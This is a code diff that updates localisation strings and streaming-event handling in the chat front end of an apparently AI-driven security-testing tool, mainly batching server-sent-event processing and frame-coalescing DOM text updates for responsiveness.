@@ -464,7 +464,7 @@
"noHistoryConversations": "No conversation history yet",
"renameGroupPrompt": "Please enter new name:",
"deleteGroupConfirm": "Are you sure you want to delete this group? Conversations in the group will not be deleted, but will be removed from the group.",
"deleteConversationConfirm": "Are you sure you want to delete this conversation?",
"deleteConversationConfirm": "Delete this conversation? Chat messages cannot be recovered, but recorded vulnerabilities will remain in the vulnerability library.",
"renameFailed": "Rename failed",
"downloadConversationFailed": "Failed to download conversation",
"viewAttackChainSelectConv": "Please select a conversation to view attack chain",
@@ -501,6 +501,8 @@
"einoStreamErrorTitle": "⚠️ Eino stream interrupted ({{agent}})",
"einoStreamErrorMessage": "Streaming read failed; the system will retry or terminate according to policy.",
"einoRunRetryTitle": "🔁 Transient error retry",
"einoEmptyResponseContinueTitle": "🔁 Auto resume (no assistant text)",
"einoEmptyResponseContinueMessage": "Session ended without captured assistant text; resuming from trace…",
"einoRunRetryErrorDetail": "Error detail",
"iterationLimitReachedTitle": "⛔ Iteration limit reached",
"iterationLimitReachedMessage": "Maximum iteration count reached; automatic iteration has stopped.",
@@ -2319,7 +2321,7 @@
"selectAll": "Select all",
"deleteSelected": "Delete selected",
"confirmDeleteNone": "Please select at least one conversation to delete",
"confirmDeleteN": "Delete {{count}} selected conversation(s)?",
"confirmDeleteN": "Delete {{count}} selected conversation(s)? Chat messages cannot be recovered, but recorded vulnerabilities will remain in the vulnerability library.",
"deleteFailed": "Delete failed",
"unnamedConversation": "Unnamed conversation"
},
+4 -2
View File
@@ -452,7 +452,7 @@
"noHistoryConversations": "暂无历史对话",
"renameGroupPrompt": "请输入新名称:",
"deleteGroupConfirm": "确定要删除此分组吗?分组中的对话不会被删除,但会从分组中移除。",
"deleteConversationConfirm": "确定要删除此对话吗?",
"deleteConversationConfirm": "确定要删除此对话吗?对话消息将不可恢复,但已记录的漏洞会保留在漏洞库中。",
"renameFailed": "重命名失败",
"downloadConversationFailed": "下载对话失败",
"viewAttackChainSelectConv": "请选择一个对话以查看攻击链",
@@ -489,6 +489,8 @@
"einoStreamErrorTitle": "⚠️ Eino 流式中断({{agent}}",
"einoStreamErrorMessage": "流式读取异常,系统将按策略重试或结束。",
"einoRunRetryTitle": "🔁 临时错误重试",
"einoEmptyResponseContinueTitle": "🔁 自动续跑(无助手正文)",
"einoEmptyResponseContinueMessage": "会话已结束但未捕获到助手正文,正在基于轨迹自动续跑…",
"einoRunRetryErrorDetail": "具体报错",
"iterationLimitReachedTitle": "⛔ 达到迭代上限",
"iterationLimitReachedMessage": "已达到最大迭代次数,任务已停止继续自动迭代。",
@@ -2307,7 +2309,7 @@
"selectAll": "全选",
"deleteSelected": "删除所选",
"confirmDeleteNone": "请先选择要删除的对话",
"confirmDeleteN": "确定要删除选中的 {{count}} 条对话吗?",
"confirmDeleteN": "确定要删除选中的 {{count}} 条对话吗?对话消息将不可恢复,但已记录的漏洞会保留在漏洞库中。",
"deleteFailed": "删除失败",
"unnamedConversation": "未命名对话"
},
+25 -25
View File
@@ -982,6 +982,24 @@ async function sendMessage() {
const reader = response.body.getReader();
const decoder = new TextDecoder();
let buffer = '';
const dispatchStreamEvent = function (eventData) {
handleStreamEvent(eventData, progressElement, progressId,
() => assistantMessageId, (id) => { assistantMessageId = id; },
() => mcpExecutionIds, (ids) => { mcpExecutionIds = ids; });
};
const processSseLines = typeof processSseDataLinesYielding === 'function'
? processSseDataLinesYielding
: async function (lines, onEvent) {
for (const line of lines) {
if (line.startsWith('data: ')) {
try {
onEvent(JSON.parse(line.slice(6)));
} catch (e) {
console.error('解析事件数据失败:', e, line);
}
}
}
};
while (true) {
const { done, value } = await reader.read();
@@ -991,18 +1009,7 @@ async function sendMessage() {
const lines = buffer.split('\n');
buffer = lines.pop(); // 保留最后一个不完整的行
for (const line of lines) {
if (line.startsWith('data: ')) {
try {
const eventData = JSON.parse(line.slice(6));
handleStreamEvent(eventData, progressElement, progressId,
() => assistantMessageId, (id) => { assistantMessageId = id; },
() => mcpExecutionIds, (ids) => { mcpExecutionIds = ids; });
} catch (e) {
console.error('解析事件数据失败:', e, line);
}
}
}
await processSseLines(lines, dispatchStreamEvent);
}
// Flush decoder internal buffer to avoid losing the final partial UTF-8 code point.
buffer += decoder.decode();
@@ -1010,18 +1017,7 @@ async function sendMessage() {
// 处理剩余的buffer
if (buffer.trim()) {
const lines = buffer.split('\n');
for (const line of lines) {
if (line.startsWith('data: ')) {
try {
const eventData = JSON.parse(line.slice(6));
handleStreamEvent(eventData, progressElement, progressId,
() => assistantMessageId, (id) => { assistantMessageId = id; },
() => mcpExecutionIds, (ids) => { mcpExecutionIds = ids; });
} catch (e) {
console.error('解析事件数据失败:', e, line);
}
}
}
await processSseLines(lines, dispatchStreamEvent);
}
} finally {
window.__csAgentLiveStream = { active: false, conversationId: null, progressId: null };
@@ -2384,6 +2380,10 @@ function renderProcessDetails(messageId, processDetails) {
itemTitle = agPx + execLine;
} else if (eventType === 'eino_agent_reply') {
itemTitle = agPx + '💬 ' + (typeof window.t === 'function' ? window.t('chat.einoAgentReplyTitle') : '子代理回复');
} else if (eventType === 'eino_empty_response_continue') {
itemTitle = typeof window.t === 'function'
? window.t('chat.einoEmptyResponseContinueTitle')
: '🔁 自动续跑(无助手正文)';
} else if (eventType === 'eino_run_retry') {
itemTitle = typeof window.t === 'function'
? window.t('chat.einoRunRetryTitle')
@@ -3369,7 +3369,7 @@ async function deleteConversationTurnFromUI(anchorBackendMessageId) {
async function deleteConversation(conversationId, skipConfirm = false) {
// 确认删除(如果调用者没有跳过确认)
if (!skipConfirm) {
if (!confirm('确定要删除这个对话吗?此操作不可恢复。')) {
if (!confirm('确定要删除这个对话吗?对话消息将不可恢复,但已记录的漏洞会保留在漏洞库中。')) {
return;
}
}
+142 -31
View File
@@ -638,18 +638,126 @@ function mergeStreamBuffer(current, delta, data) {
if (typeof window !== 'undefined') {
window.streamBufferFromAccumulated = streamBufferFromAccumulated;
window.mergeStreamBuffer = mergeStreamBuffer;
window.processSseDataLinesYielding = processSseDataLinesYielding;
window.flushStreamPlainTextUpdate = flushStreamPlainTextUpdate;
window.scheduleStreamPlainTextUpdate = scheduleStreamPlainTextUpdate;
}
/** 流式纯文本 DOM:按帧合并更新,尽量增量 appendData,避免每条 SSE 全量 textContent 阻塞主线程 */
const streamPlainDomState = new WeakMap();
/** 跟踪仍有待刷新的流式节点,便于快照时间线前一次性 flush */
const streamPlainDomPendingElements = new Set();
function applyStreamPlainTextNow(contentEl, text, state) {
if (!contentEl) return;
const full = text == null ? '' : String(text);
const prevLen = state && state.renderedLen ? state.renderedLen : 0;
contentEl.classList.add('timeline-stream-plain');
if (full.length > prevLen && contentEl.childNodes.length === 1 &&
contentEl.firstChild && contentEl.firstChild.nodeType === Node.TEXT_NODE) {
const existing = contentEl.firstChild.nodeValue || '';
if (existing.length === prevLen && full.startsWith(existing)) {
const delta = full.slice(prevLen);
if (delta) {
contentEl.firstChild.appendData(delta);
if (state) {
state.renderedLen = full.length;
state.pendingText = full;
}
return;
}
}
}
contentEl.textContent = full;
if (state) {
state.renderedLen = full.length;
state.pendingText = full;
}
}
function flushStreamPlainTextUpdate(contentEl) {
if (!contentEl) return;
const state = streamPlainDomState.get(contentEl);
if (!state) return;
if (state.rafId) {
cancelAnimationFrame(state.rafId);
state.rafId = 0;
}
applyStreamPlainTextNow(contentEl, state.pendingText, state);
}
function scheduleStreamPlainTextUpdate(contentEl, text) {
if (!contentEl) return;
const full = text == null ? '' : String(text);
let state = streamPlainDomState.get(contentEl);
if (!state) {
state = { pendingText: full, rafId: 0, renderedLen: 0 };
streamPlainDomState.set(contentEl, state);
} else {
state.pendingText = full;
}
streamPlainDomPendingElements.add(contentEl);
if (state.rafId) return;
state.rafId = requestAnimationFrame(function () {
state.rafId = 0;
applyStreamPlainTextNow(contentEl, state.pendingText, state);
});
}
function resetStreamPlainTextState(contentEl) {
if (!contentEl) return;
const state = streamPlainDomState.get(contentEl);
if (state && state.rafId) {
cancelAnimationFrame(state.rafId);
}
streamPlainDomState.delete(contentEl);
streamPlainDomPendingElements.delete(contentEl);
}
function flushAllPendingStreamPlainUpdates() {
streamPlainDomPendingElements.forEach(function (el) {
if (el && el.isConnected) {
flushStreamPlainTextUpdate(el);
}
});
}
/** 流式 delta:纯文本,避免每条全量 marked + DOMPurify */
function setTimelineItemContentStreamPlain(contentEl, text) {
if (!contentEl) return;
contentEl.classList.add('timeline-stream-plain');
contentEl.textContent = text == null ? '' : String(text);
resetStreamPlainTextState(contentEl);
applyStreamPlainTextNow(contentEl, text, null);
}
/**
* 分批处理 SSE data 行并在批间让出主线程避免单次 read() 内数百条事件连续阻塞 UI
* @param {string[]} lines
* @param {(event: object) => void} onEvent
* @param {{ yieldEvery?: number }} [options]
*/
async function processSseDataLinesYielding(lines, onEvent, options) {
const yieldEvery = (options && options.yieldEvery) || 32;
for (let i = 0; i < lines.length; i++) {
const line = lines[i];
if (line.startsWith('data: ')) {
try {
onEvent(JSON.parse(line.slice(6)));
} catch (e) {
console.error('解析事件数据失败:', e, line);
}
}
if ((i + 1) % yieldEvery === 0 && i + 1 < lines.length) {
await new Promise(function (resolve) { requestAnimationFrame(resolve); });
}
}
}
/** 流结束或非流式:富文本(已消毒的 HTML 字符串) */
function setTimelineItemContentStreamRich(contentEl, html) {
if (!contentEl) return;
resetStreamPlainTextState(contentEl);
contentEl.classList.remove('timeline-stream-plain');
contentEl.innerHTML = html;
}
@@ -1054,6 +1162,9 @@ function integrateProgressToMCPSection(progressId, assistantMessageId, mcpExecut
const progressElement = document.getElementById(progressId);
if (!progressElement) return;
// 快照 innerHTML 前刷掉尚未执行的 rAF 流式更新,避免过程详情少最后几帧
flushAllPendingStreamPlainUpdates();
// Ensure any "running" tool_call badges are closed before we snapshot timeline HTML.
// Otherwise, once the progress element is removed, later 'done' events may not be able
// to update the original timeline DOM and the copied HTML would stay "执行中".
@@ -1668,7 +1779,7 @@ function handleStreamEvent(event, progressElement, progressId,
if (item) {
const contentEl = item.querySelector('.timeline-item-content');
if (contentEl) {
setTimelineItemContentStreamPlain(contentEl, s.buffer);
scheduleStreamPlainTextUpdate(contentEl, s.buffer);
}
}
break;
@@ -1688,6 +1799,7 @@ function handleStreamEvent(event, progressElement, progressId,
if (item) {
const contentEl = item.querySelector('.timeline-item-content');
if (contentEl) {
flushStreamPlainTextUpdate(contentEl);
if (typeof formatMarkdown === 'function') {
setTimelineItemContentStreamRich(contentEl, formatMarkdown(s.buffer, timelineMarkdownOpts));
} else {
@@ -1784,6 +1896,21 @@ function handleStreamEvent(event, progressElement, progressId,
break;
}
case 'eino_empty_response_continue': {
const d = event.data || {};
const title = typeof window.t === 'function'
? window.t('chat.einoEmptyResponseContinueTitle')
: '🔁 自动续跑(无助手正文)';
addTimelineItem(timeline, 'warning', {
title: title,
message: event.message || (typeof window.t === 'function'
? window.t('chat.einoEmptyResponseContinueMessage')
: '会话已结束但未捕获到助手正文,正在基于轨迹自动续跑…'),
data: d
});
break;
}
case 'eino_run_retry': {
const d = event.data || {};
const title = typeof window.t === 'function'
@@ -1899,7 +2026,7 @@ function handleStreamEvent(event, progressElement, progressId,
const pre = item.querySelector('pre.tool-result');
if (pre) {
pre.classList.remove('tool-result-pending');
pre.textContent = state.buffer;
scheduleStreamPlainTextUpdate(pre, state.buffer);
}
}
break;
@@ -2006,7 +2133,7 @@ function handleStreamEvent(event, progressElement, progressId,
}
}
if (contentEl) {
setTimelineItemContentStreamPlain(contentEl, s.buffer);
scheduleStreamPlainTextUpdate(contentEl, s.buffer);
}
}
break;
@@ -2033,6 +2160,7 @@ function handleStreamEvent(event, progressElement, progressId,
contentEl.className = 'timeline-item-content';
item.appendChild(contentEl);
}
flushStreamPlainTextUpdate(contentEl);
if (typeof formatMarkdown === 'function') {
setTimelineItemContentStreamRich(contentEl, formatMarkdown(full, timelineMarkdownOpts));
} else {
@@ -2209,15 +2337,13 @@ function handleStreamEvent(event, progressElement, progressId,
if (!deltaContent && streamBufferFromAccumulated(responseData) === null) break;
state.buffer = mergeStreamBuffer(state.buffer, deltaContent, responseData);
// 更新时间线条目内容
// 流式阶段仅追加纯文本;formatTimelineStreamBody 在终态 response 时一次性处理
if (state.itemId) {
const item = document.getElementById(state.itemId);
if (item) {
const contentEl = item.querySelector('.timeline-item-content');
if (contentEl) {
const meta = state.streamMeta || responseData;
const body = formatTimelineStreamBody(state.buffer, meta);
setTimelineItemContentStreamPlain(contentEl, body);
scheduleStreamPlainTextUpdate(contentEl, state.buffer);
}
}
}
@@ -2757,39 +2883,22 @@ async function attachRunningTaskEventStream(conversationId) {
const reader = response.body.getReader();
const decoder = new TextDecoder();
let buffer = '';
const dispatchTaskEvent = function (eventData) {
handleStreamEvent(eventData, null, progressId, getAssistantIdFn, setAssistantIdFn, function () { return mcpIds; }, function (ids) { mcpIds = mergeMcpExecutionIDLists(mcpIds, ids || []); });
};
while (true) {
const chunk = await reader.read();
if (chunk.done) break;
buffer += decoder.decode(chunk.value, { stream: true });
const lines = buffer.split('\n');
buffer = lines.pop() || '';
for (let li = 0; li < lines.length; li++) {
const line = lines[li];
if (line.indexOf('data: ') === 0) {
try {
const eventData = JSON.parse(line.slice(6));
handleStreamEvent(eventData, null, progressId, getAssistantIdFn, setAssistantIdFn, function () { return mcpIds; }, function (ids) { mcpIds = mergeMcpExecutionIDLists(mcpIds, ids || []); });
} catch (e) {
console.error('task-events parse', e);
}
}
}
await processSseDataLinesYielding(lines, dispatchTaskEvent);
}
// Flush decoder internal buffer to avoid dropping trailing partial UTF-8 bytes.
buffer += decoder.decode();
if (buffer.trim()) {
const lines = buffer.split('\n');
for (let li = 0; li < lines.length; li++) {
const line = lines[li];
if (line.indexOf('data: ') === 0) {
try {
const eventData = JSON.parse(line.slice(6));
handleStreamEvent(eventData, null, progressId, getAssistantIdFn, setAssistantIdFn, function () { return mcpIds; }, function (ids) { mcpIds = mergeMcpExecutionIDLists(mcpIds, ids || []); });
} catch (e) {
console.error('task-events parse', e);
}
}
}
await processSseDataLinesYielding(lines, dispatchTaskEvent);
}
if (window.csTaskReplay && window.csTaskReplay.progressId === progressId) {
clearCsTaskReplay();
@@ -2921,7 +3030,9 @@ function mergeToolResultIntoCallItem(item, data, options) {
const pre = section.querySelector('pre.tool-result');
if (pre) {
pre.classList.remove('tool-result-pending');
flushStreamPlainTextUpdate(pre);
pre.textContent = text;
resetStreamPlainTextState(pre);
}
if (data.executionId) {